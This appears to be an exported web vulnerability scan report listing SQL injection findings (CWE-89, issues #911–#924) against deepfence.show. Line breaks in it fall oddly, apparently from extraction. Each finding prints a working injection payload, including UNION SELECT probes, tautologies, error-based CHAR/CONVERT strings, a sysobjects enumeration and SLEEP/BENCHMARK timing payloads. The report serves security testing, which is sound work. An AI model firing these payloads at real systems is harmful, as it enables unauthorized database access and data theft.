href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #911\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io//\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #912\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+\nCHAR(116)+CHAR(69)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #913\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io admin') or ('1'='1'#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #914\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioadmin\" or 1=1/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #915\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ' and 1 in (select min(name) from sysobjects where xtype \n= 'U' and name > '.') --\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #916\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Valuedemouser@deepfence.io UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #917\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND (SELECT 4523 FROM(SELECT COUNT(*),CONCAT(\n0x716a7a6a71,(SELECT (ELT(4523=4523,1))),0x71706a6b71,\nFLOOR(RAND(0)*2))x FROM \nINFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #918\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR\n(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(\n116)+CHAR(69)+CHAR(65)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #919\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioOR 1=0#ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #920\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7,8\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.ioCWE-ID CWE-89\nIssue Number #921\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io'^'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #922\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io WHERE 1=1 AND 1=1--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #923\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 14#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #924\nSQL InjectionScan\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 